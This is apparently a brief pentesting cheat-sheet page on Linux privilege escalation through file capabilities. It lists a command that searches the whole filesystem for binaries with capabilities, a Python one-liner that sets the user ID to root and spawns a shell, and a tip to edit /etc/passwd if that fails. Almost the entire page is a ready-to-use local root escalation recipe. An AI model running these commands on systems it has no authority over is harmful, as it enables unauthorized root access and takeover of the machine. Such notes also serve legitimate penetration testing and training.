githubEdit

capability

get system capability

 getcap -r / 2>/dev/null 
usr/bin/python2.6  -c 'import os; os.setuid(0); os.system("/bin/sh")'


try to edit on /etc/passwd if the first case not work

Last updated